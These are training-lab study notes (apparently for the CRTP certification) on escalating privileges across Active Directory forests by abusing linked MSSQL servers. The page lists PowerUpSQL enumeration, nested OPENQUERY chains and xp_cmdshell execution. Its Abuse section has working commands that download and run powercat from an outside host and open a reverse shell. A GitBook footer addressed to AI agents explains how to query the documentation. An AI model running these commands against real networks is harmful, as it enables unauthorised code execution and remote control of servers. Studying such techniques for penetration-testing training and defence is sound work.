> For the complete documentation index, see [llms.txt](https://dudisamarel.gitbook.io/crtp-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dudisamarel.gitbook.io/crtp-notes/privilege-escalation/cross-domain-privilege-escalation/mssql-servers.md). # MSSQL Servers ## Tools [PowerUpSQL ](https://github.com/NetSPI/PowerUpSQL)includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. {% embed url="" %} ## Enumeration ```powershell # SPN Get-SQLInstanceDomain # Check Access Get-SQLConnectionTestThreaded Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded # Information Get-SQLInstanceDomain | Get-SQLServerInfo ``` ### Database Links A database link allows a SQL Server to access external data sources like other SQL Servers and Data Source Objects (OLE DB). In case of database links between SQL servers, that is, linked SQL servers it is possible to execute stored procedures even across forest trusts. 
# find links to remote machine
Get-SQLServerLink -Instance dcorp-mssql
# Using HeidiSQL
select * from master..sysservers

# database links
Get-SQLServerLinkCrawl -Instance dcorp-mssql 
# Using HeidiSQL 
select * from openquery("DCORP-SQL1", 'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')
## Abuse We can use links to execute commands across database links where Sysadmin set to 1 ```powershell Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql # Using HeidiSQL SELECT * FROM OPENQUERY("dcorp-sql1", ' SELECT * FROM OPENQUERY("dcorp-mgmt", '' SELECT * FROM OPENQUERY("EU-SQL32.EU.EUROCORP.LOCAL",'''' SELECT @@version AS version; EXEC master..xp_cmdshell "powershell iex (iwr http://172.16.100.83/powercat.ps1 -UseBasicParsing)"; '''') '') ') # revshell example Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex ((New-Object Net.WebClient).DownloadString(''http://172.16.100.83/powercat.ps1;powercat -c 172.16.100.83 -p 443 -e powershell''));"' -QueryTarget eu-sql32 ``` In case that `rpcout` is enabled (disabled by default), xp\_cmdshell can be enabled using: ```sql EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql" ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dudisamarel.gitbook.io/crtp-notes/privilege-escalation/cross-domain-privilege-escalation/mssql-servers.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.